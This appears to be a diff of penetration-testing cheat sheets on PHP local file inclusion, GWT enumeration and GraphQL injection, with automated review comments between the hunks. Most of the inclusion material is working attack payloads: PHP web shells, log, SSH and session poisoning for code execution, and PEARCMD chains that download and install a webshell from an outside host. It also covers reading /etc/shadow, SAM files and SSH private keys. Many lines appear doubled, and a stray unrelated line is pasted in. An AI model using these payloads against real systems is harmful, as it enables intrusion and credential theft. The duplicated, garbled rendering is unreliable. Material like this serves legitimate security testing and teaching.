./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input ./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input
``` ```
### Wrapper zip://
1. Create an evil payload: `echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;`
2. Zip the file
```python
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
```
3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php
### Wrapper phar:// ### Wrapper phar://
Create a phar file with a serialized object in its meta-data. Create a phar file with a serialized object in its meta-data.
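Review bot: step 1 of the relocated zip:// section builds the payload with `echo "<pre><?php system($_GET['cmd']); ?></pre>"` in double quotes, so the shell expands `$_GET` (unset) and the file ends up containing `system(['cmd'])`, which is not valid PHP; use single quotes or escape it as `\$_GET` the way the Apache-logs section further down does. The fenced block is also tagged `python` for what are shell commands, and step 3's URL sits outside any code span.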
@@ -213,11 +272,69 @@ include('phar://test.phar');
NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more. NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.
### Wrapper convert.iconv:// and dechunk://
#### Leak file content from error-based oracle
- `convert.iconv://`: convert input into another folder (`convert.iconv.utf-16le.utf-8`)
- `dechunk://`: if the string contains no newlines, it will wipe the entire string if and only if
the string starts with A-Fa-f0-9
The goal of this exploitation is to leak the content of a file, one character at a time, based on the [DownUnderCTF](https://github.com/DownUnderCTF/Challenges_2022_Public/blob/main/web/minimal-php/solve/solution.py) writeup.
**Requirements**:
- Backend must not use `file_exists` or `is_file`.
- Vulnerable parameter should be in a `POST` request.
- You can't leak more than 135 characters in a GET request due to the size limit
The exploit chain is based on PHP filters: `iconv` and `dechunk`:
1. Use the `iconv` filter with an encoding increasing the data size exponentially to trigger a memory error.
2. Use the `dechunk` filter to determine the first character of the file, based on the previous error.
3. Use the `iconv` filter again with encodings having different bytes ordering to swap remaining characters with the first one.
Exploit using [synacktiv/php_filter_chains_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit), the script will use either the `HTTP status code: 500` or the time as an error-based oracle to determine the character.
```ps1
$ python3 filters_chain_oracle_exploit.py --target http://127.0.0.1 --file '/test' --parameter 0
[*] The following URL is targeted : http://127.0.0.1
[*] The following local file is leaked : /test
[*] Running POST requests
[+] File /test leak is finished!
```
#### Leak file content inside a custom format output
* [ambionics/wrapwrap](https://github.com/ambionics/wrapwrap) - Generates a `php://filter` chain that adds a prefix and a suffix to the contents of a file.
To obtain the contents of some file, we would like to have: `{"message":"<file contents>"}`.
```ps1
./wrapwrap.py /etc/passwd 'PREFIX' 'SUFFIX' 1000
./wrapwrap.py /etc/passwd '{"message":"' '"}' 1000
./wrapwrap.py /etc/passwd '<root><name>' '</name></root>' 1000
```
This can be used against vulnerable code like the following.
```php
<?php
$data = file_get_contents($_POST['url']);
$data = json_decode($data);
echo $data->message;
?>
```
## LFI to RCE via /proc/*/fd ## LFI to RCE via /proc/*/fd
1. Upload a lot of shells (for example : 100) 1. Upload a lot of shells (for example : 100)
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too) 2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
## LFI to RCE via /proc/self/environ ## LFI to RCE via /proc/self/environ
Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
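Review bot: `convert.iconv` and `dechunk` are `php://filter` filters, not stream wrappers, so the heading "Wrapper convert.iconv:// and dechunk://" and the `convert.iconv://` / `dechunk://` bullet labels are misleading; name them as filters used inside `php://filter/.../resource=`. In the first bullet "convert input into another folder" should read "another encoding", and the `dechunk` bullet is split mid-sentence across two lines ("if and only if" / "the string starts with A-Fa-f0-9"); join it. The requirements list also says "Vulnerable parameter should be in a `POST` request" and then explains the GET limit only as "the size limit"; say it is the URL length limit so the two bullets read as one constraint.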
@@ -227,6 +344,7 @@ GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?> User-Agent: <?=phpinfo(); ?>
``` ```
## LFI to RCE via upload ## LFI to RCE via upload
If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ). If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ).
@@ -237,10 +355,11 @@ http://example.com/index.php?page=path/to/uploaded/file.png
In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
## LFI to RCE via upload (race) ## LFI to RCE via upload (race)
Worlds Quitest Let's Play"
* Upload a file and trigger a self-inclusion. * Upload a file and trigger a self-inclusion.
* Repeat 1 a shitload of time to: * Repeat the upload a shitload of time to:
* increase our odds of winning the race * increase our odds of winning the race
* increase our guessing odds * increase our guessing odds
* Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6} * Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6}
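Review bot: the stray line `Worlds Quitest Let's Play"` appears on only one side of this hunk and is a paste artifact unrelated to the race technique; make sure it is absent from the new text. The reworded step "Repeat the upload a shitload of time to:" still uses informal wording; "many times" reads better in a reference list.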
@@ -269,10 +388,29 @@ print('[x] Something went wrong, please try again')
``` ```
## LFI to RCE via upload (FindFirstFile)
:warning: Only works on Windows
`FindFirstFile` allows using masks (`<<` as `*` and `>` as `?`) in LFI paths on Windows. A mask is essentially a search pattern that can include wildcard characters, allowing users or developers to search for files or directories based on partial names or types. In the context of FindFirstFile, masks are used to filter and match the names of files or directories.
* `*`/`<<` : Represents any sequence of characters.
* `?`/`>` : Represents any single character.
Upload a file, it should be stored in the temp folder `C:\Windows\Temp\` with a generated name like `php[A-F0-9]{4}.tmp`.
Then either bruteforce the 65536 filenames or use a wildcard character like: `http://site/vuln.php?inc=c:\windows\temp\php<<`
## LFI to RCE via phpinfo() ## LFI to RCE via phpinfo()
https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf PHPinfo() displays the content of any variables such as **$_GET**, **$_POST** and **$_FILES**.
Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
> By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name.
Use the script [phpInfoLFI.py](https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
## LFI to RCE via controlled log file ## LFI to RCE via controlled log file
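Review bot: the FindFirstFile section should say explicitly that the temp file `C:\Windows\Temp\php[A-F0-9]{4}.tmp` exists only for the lifetime of the request that uploaded it (PHP removes upload temp files at request end unless they are moved), so the wildcard include has to be issued concurrently, as in the race section above; as written, "bruteforce the 65536 filenames" sounds like an unhurried loop. In the phpinfo() section the "Use the script" sentence appears once as a bare URL and once as a markdown link; make sure only the markdown form remains, and move the "Research from ..." line into the References list where the other sources live.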
@@ -281,6 +419,8 @@ Just append your PHP code into the log file by doing a request to the service (A
```powershell ```powershell
http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/apache2/access.log
http://example.com/index.php?page=/var/log/apache2/error.log
http://example.com/index.php?page=/var/log/nginx/access.log http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log http://example.com/index.php?page=/var/log/nginx/error.log
http://example.com/index.php?page=/var/log/vsftpd.log http://example.com/index.php?page=/var/log/vsftpd.log
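Review bot: adding the `/var/log/apache2/*` paths is right for Debian-family layouts, but the list would be more useful with a note that log-file inclusion only works when the web server's own user can read these files; on hardened installs the log directory is not readable by that user and the include just fails, which is also the mitigation to recommend.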
@@ -291,6 +431,7 @@ http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log http://example.com/index.php?page=/usr/local/apache2/log/error_log
``` ```
### RCE via SSH ### RCE via SSH
Try to ssh into the box with a PHP code as username `<?php system($_GET["cmd"]);?>`. Try to ssh into the box with a PHP code as username `<?php system($_GET["cmd"]);?>`.
@@ -305,6 +446,7 @@ Then include the SSH log files inside the Web Application.
http://example.com/index.php?page=/var/log/auth.log&cmd=id http://example.com/index.php?page=/var/log/auth.log&cmd=id
``` ```
### RCE via Mail ### RCE via Mail
First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`. First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`.
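Review bot: "include the log file located at `http://example.com/index.php?page=/var/log/mail`" conflates the file path with the request URL; say the log file `/var/log/mail` is included via `index.php?page=/var/log/mail`.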
@@ -334,6 +476,24 @@ In some cases you can also send the email with the `mail` command line.
mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null
``` ```
### RCE via Apache logs
Poison the User-Agent in access logs:
```
$ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>"
```
Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.
Then request the logs via the LFI and execute your command.
```
$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id
```
## LFI to RCE via PHP sessions ## LFI to RCE via PHP sessions
Check if the website use PHP Session (PHPSESSID) Check if the website use PHP Session (PHPSESSID)
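Review bot: the second command in the new Apache-logs section, `curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id`, is unquoted, so the shell treats `&` as a job separator and `cmd=id` never reaches the server; quote the URL as the earlier examples do. Both fences here are untagged while the rest of the file tags them, and the section largely duplicates "LFI to RCE via controlled log file" above (same `/var/log/apache2/access.log` path); fold the User-Agent poisoning example and the double-quote escaping caveat into that section rather than adding a parallel one.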
@@ -343,7 +503,7 @@ Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
``` ```
In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] or /var/lib/php/sessions/sess_[PHPSESSID] files
```javascript ```javascript
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27. /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
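Review bot: the session-file path is fenced as `javascript` and ends with a stray period (`sess_i56kgbsq9rm8ndg3qbarhsbm27.`) that a reader may copy into the include path; drop the period and use a neutral fence tag. The added `/var/lib/php/sessions/` location is correct and worth keeping since `/var/lib/php5/` only exists on old installs.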
@@ -362,10 +522,58 @@ Use the LFI to include the PHP session file
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
``` ```
## LFI to RCE via PHP PEARCMD
PEAR is a framework and distribution system for reusable PHP components. By default `pearcmd.php` is installed in every Docker PHP image from [hub.docker.com](https://hub.docker.com/_/php) in `/usr/local/lib/php/pearcmd.php`.
The file `pearcmd.php` uses `$_SERVER['argv']` to get its arguments. The directive `register_argc_argv` must be set to `On` in PHP configuration (`php.ini`) for this attack to work.
```ini
register_argc_argv = On
```
There are this ways to exploit it.
* Method 1: config create
```ps1
/vuln.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=eval($_GET['cmd'])?>+/tmp/exec.php
/vuln.php?file=/tmp/exec.php&cmd=phpinfo();die();
```
* Method 2: man_dir
```ps1
/vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+
/vuln.php?file=/tmp/exec.php&c=id
```
The created configuration file contains the webshell.
```php
#PEAR_Config 0.9
a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"<?echo(system($_GET['c']));?>";}
```
* Method 3: download
Need external network connection.
```ps1
/vuln.php?file=/usr/local/lib/php/pearcmd.php&+download+http://<ip>:<port>/exec.php
/vuln.php?file=exec.php&c=id
```
* Method 4: install
Need external network connection.
Notice that `exec.php` locates at `/tmp/pear/download/exec.php`.
```ps1
/vuln.php?file=/usr/local/lib/php/pearcmd.php&+install+http://<ip>:<port>/exec.php
/vuln.php?file=/tmp/pear/download/exec.php&c=id
```
## LFI to RCE via credentials files ## LFI to RCE via credentials files
This method require high privileges inside the application in order to read the sensitive files. This method require high privileges inside the application in order to read the sensitive files.
### Windows version ### Windows version
First extract `sam` and `system` files. First extract `sam` and `system` files.
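Review bot: "There are this ways to exploit it." should read "There are several ways to exploit it." More usefully, the PEARCMD section should explain why the Docker images are affected: the official images ship without a `php.ini`, so the compiled-in default for `register_argc_argv` (On) applies, whereas `php.ini-production` sets it Off; that tells readers both why the `ini` line matters and what the fix is. Methods 3 and 4 say "Need external network connection"; say "require the target to reach an externally hosted `exec.php`", since that is what the `http://<ip>:<port>/exec.php` lines assume.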
@@ -377,6 +585,7 @@ http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique. Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique.
### Linux version ### Linux version
First extract `/etc/shadow` files. First extract `/etc/shadow` files.
@@ -387,6 +596,10 @@ http://example.com/index.php?page=../../../../../../etc/shadow
Then crack the hashes inside in order to login via SSH on the machine. Then crack the hashes inside in order to login via SSH on the machine.
Another way to gain SSH access to a Linux machine through LFI is by reading the private key file, id_rsa.
If SSH is active check which user is being used `/proc/self/status` and `/etc/passwd` and try to access `/<HOME>/.ssh/id_rsa`.
## References ## References
* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
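Review bot: "check which user is being used `/proc/self/status` and `/etc/passwd`" is missing its connecting words; say "read `/proc/self/status` to learn which user the web server runs as, look up that user's home directory in `/etc/passwd`, then try `/<HOME>/.ssh/id_rsa`". The key file may also be `id_ecdsa` or `id_ed25519` on newer installs, so "id_rsa" should not be presented as the only name.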
@@ -396,11 +609,18 @@ Then crack the hashes inside in order to login via SSH on the machine.
* [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/) * [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
* [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html) * [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
* [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) * [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
* [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017) * [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
* [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379) * [Чтение файлов => unserialize !](https://web.archive.org/web/20200809082021/https://rdot.org/forum/showthread.php?t=4379)
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/) * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
* [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
* [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376)
* [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
* [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
* [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)
* [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
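Review bot: the CVV #1 Local File Inclusion reference is listed twice in this hunk, once as `* [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)` and again as `* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](...)` with the same URL; keep the dated entry and drop the other. The soffensive.com and rdot.org entries were swapped for web.archive.org snapshots, but the devels-playground.blogspot.fr and mannulinux.org entries are left as plain `http://` links; give them the same treatment (archive snapshot or at least https) for consistency.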


@@ -0,0 +1,55 @@
# Google Web Toolkit
> Google Web Toolkit (GWT), also known as GWT Web Toolkit, is an open-source set of tools that allows web developers to create and maintain JavaScript front-end applications using Java. It was originally developed by Google and had its initial release on May 16, 2006.
## Summary
* [Tools](#tools)
* [Enumerate](#enumerate)
* [References](#references)
## Tools
* [FSecureLABS/GWTMap](https://github.com/FSecureLABS/GWTMap)
* [GDSSecurity/GWT-Penetration-Testing-Toolset](https://github.com/GDSSecurity/GWT-Penetration-Testing-Toolset)
## Enumerate
* Enumerate the methods of a remote application via it's bootstrap file and create a local backup of the code (selects permutation at random):
```ps1
./gwtmap.py -u http://10.10.10.10/olympian/olympian.nocache.js --backup
```
* Enumerate the methods of a remote application via a specific code permutation
```ps1
./gwtmap.py -u http://10.10.10.10/olympian/C39AB19B83398A76A21E0CD04EC9B14C.cache.js
```
* Enumerate the methods whilst routing traffic through an HTTP proxy:
```ps1
./gwtmap.py -u http://10.10.10.10/olympian/olympian.nocache.js --backup -p http://127.0.0.1:8080
```
* Enumerate the methods of a local copy (a file) of any given permutation:
```ps1
./gwtmap.py -F test_data/olympian/C39AB19B83398A76A21E0CD04EC9B14C.cache.js
```
* Filter output to a specific service or method:
```ps1
./gwtmap.py -u http://10.10.10.10/olympian/olympian.nocache.js --filter AuthenticationService.login
```
* Generate RPC payloads for all methods of the filtered service, with coloured output
```ps1
./gwtmap.py -u http://10.10.10.10/olympian/olympian.nocache.js --filter AuthenticationService --rpc --color
```
* Automatically test (probe) the generate RPC request for the filtered service method
```ps1
./gwtmap.py -u http://10.10.10.10/olympian/olympian.nocache.js --filter AuthenticationService.login --rpc --probe
./gwtmap.py -u http://10.10.10.10/olympian/olympian.nocache.js --filter TestService.testDetails --rpc --probe
```
## References
* [From Serialized to Shell :: Exploiting Google Web Toolkit with EL Injection - May 22, 2017](https://srcincite.io/blog/2017/05/22/from-serialized-to-shell-auditing-google-web-toolkit-with-el-injection.html)
* [Hacking a Google Web Toolkit application - April 22, 2021 - thehackerish](https://thehackerish.com/hacking-a-google-web-toolkit-application/)
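Review bot: two typos in the Enumerate list: `Enumerate the methods of a remote application via it's bootstrap file` should read `via its bootstrap file`, and `Automatically test (probe) the generate RPC request` should read `the generated RPC request`. The code fences are tagged `ps1` but every command is `./gwtmap.py ...`, a Python script invoked from a Unix shell, so `bash` (or `python3 gwtmap.py ...`) is the accurate tag. The permutation hash `C39AB19B83398A76A21E0CD04EC9B14C` is the one shipped in GWTMap's own `test_data/olympian/`, as the `-F` example shows; a sentence saying that it is a sample value, like the `10.10.10.10` host, would stop readers from looking for that exact file on their target.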


@@ -1,33 +1,69 @@
# GraphQL injection # GraphQL Injection
> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. A GraphQL service is created by defining types and fields on those types, then providing functions for each field on each type > GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. A GraphQL service is created by defining types and fields on those types, then providing functions for each field on each type
## Summary ## Summary
* [Tools](#tools) - [GraphQL injection](#graphql-injection)
* [Exploit](#exploit) - [Summary](#summary)
* [Identify an injection point](#identify-an-injection-point) - [Tools](#tools)
* [Enumerate Database Schema via Instropection](#enumerate-database-schema-via-introspection) - [Enumeration](#enumeration)
* [Extract data](#extract-data) - [Common GraphQL endpoints](#common-graphql-endpoints)
* [Enumerate the types' definition](#enumerate-the-type-definition) - [Identify an injection point](#identify-an-injection-point)
* [Use mutations](#use-mutations) - [Enumerate Database Schema via Introspection](#enumerate-database-schema-via-introspection)
* [NOSQL injection](#nosql-injection) - [Enumerate Database Schema via Suggestions](#enumerate-database-schema-via-suggestions)
* [SQL injection](#sql-injection) - [Enumerate the types' definition](#enumerate-the-types-definition)
* [References](#references) - [List path to reach a type](#list-path-to-reach-a-type)
- [Exploit](#exploit)
- [Extract data](#extract-data)
- [Extract data using edges/nodes](#extract-data-using-edgesnodes)
- [Extract data using projections](#extract-data-using-projections)
- [Use mutations](#use-mutations)
- [GraphQL Batching Attacks](#graphql-batching-attacks)
- [JSON list based batching](#json-list-based-batching)
- [Query name based batching](#query-name-based-batching)
- [Injections](#injections)
- [NOSQL injection](#nosql-injection)
- [SQL injection](#sql-injection)
- [References](#references)
## Tools ## Tools
* [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap) * [swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap) - Scripting engine to interact with a graphql endpoint for pentesting purposes
* [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/) * [doyensec/graph-ql](https://github.com/doyensec/graph-ql/) - GraphQL Security Research Material
* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide) * [doyensec/inql](https://github.com/doyensec/inql) - A Burp Extension for GraphQL Security Testing
* [doyensec/GQLSpection](https://github.com/doyensec/GQLSpection) - GQLSpection - parses GraphQL introspection schema and generates possible queries
* [dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum) - Lists the different ways of reaching a given type in a GraphQL schema
* [andev-software/graphql-ide](https://github.com/andev-software/graphql-ide) - An extensive IDE for exploring GraphQL API's
* [mchoji/clairvoyancex](https://github.com/mchoji/clairvoyancex) - Obtain GraphQL API schema despite disabled introspection
* [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility
* [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
* [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs
* [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph
* [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client
## Enumeration
### Common GraphQL endpoints
Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint.
A more complete list is available at [danielmiessler/SecLists/graphql.txt](https://github.com/danielmiessler/SecLists/blob/fe2aa9e7b04b98d94432320d09b5987f39a17de8/Discovery/Web-Content/graphql.txt).
```ps1
/v1/explorer
/v1/graphiql
/graph
/graphql
/graphql/console/
/graphql.php
/graphiql
/graphiql.php
```
## Exploit
### Identify an injection point ### Identify an injection point
Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint.
```js ```js
example.com/graphql?query={__schema{types{name}}} example.com/graphql?query={__schema{types{name}}}
example.com/graphiql?query={__schema{types{name}}} example.com/graphiql?query={__schema{types{name}}}
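Review bot: the rewritten Summary lists `- [GraphQL injection](#graphql-injection)` and `- [Summary](#summary)` as entries of itself and switches the bullet style from `*` to `-`; the other pages added in this commit (Google Web Toolkit, HTTP Parameter Pollution) keep `*` and start at Tools, so drop the two self-referential entries and restore `*`. In Tools, `* [doyensec/GQLSpection](https://github.com/doyensec/GQLSpection) - GQLSpection - parses GraphQL introspection schema` repeats the tool name after the dash. The Common GraphQL endpoints block is a plain path list fenced as `ps1`; a fence without a language (or `text`) avoids PowerShell highlighting on entries like `/graphql.php`.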
@@ -149,14 +185,29 @@ query IntrospectionQuery {
} }
``` ```
Single line queries to dump the database schema without fragments.
### Extract data
```js ```js
example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}} __schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}}
``` ```
![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true) ```js
{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
```
### Enumerate Database Schema via Suggestions
When you use an unknown keyword, the GraphQL backend will respond with a suggestion related to its schema.
```json
{
"message": "Cannot query field \"one\" on type \"Query\". Did you mean \"node\"?",
}
```
You can also try to bruteforce known keywords, field and type names using wordlists such as [Escape-Technologies/graphql-wordlist](https://github.com/Escape-Technologies/graphql-wordlist) when the schema of a GraphQL API is not accessible.
### Enumerate the types' definition ### Enumerate the types' definition
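Review bot: the lead-in `Single line queries to dump the database schema without fragments.` only describes the first block; the second block is built on `fragment FullType on __Type`, `fragment InputValue on __InputValue` and `fragment TypeRef on __Type`, so label the two blocks (without fragments / with fragments) or move the sentence. In the suggestions example the line `"message": "Cannot query field \"one\" on type \"Query\". Did you mean \"node\"?",` ends with a trailing comma before the closing `}`, which is invalid JSON inside a `json` fence; drop the comma.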
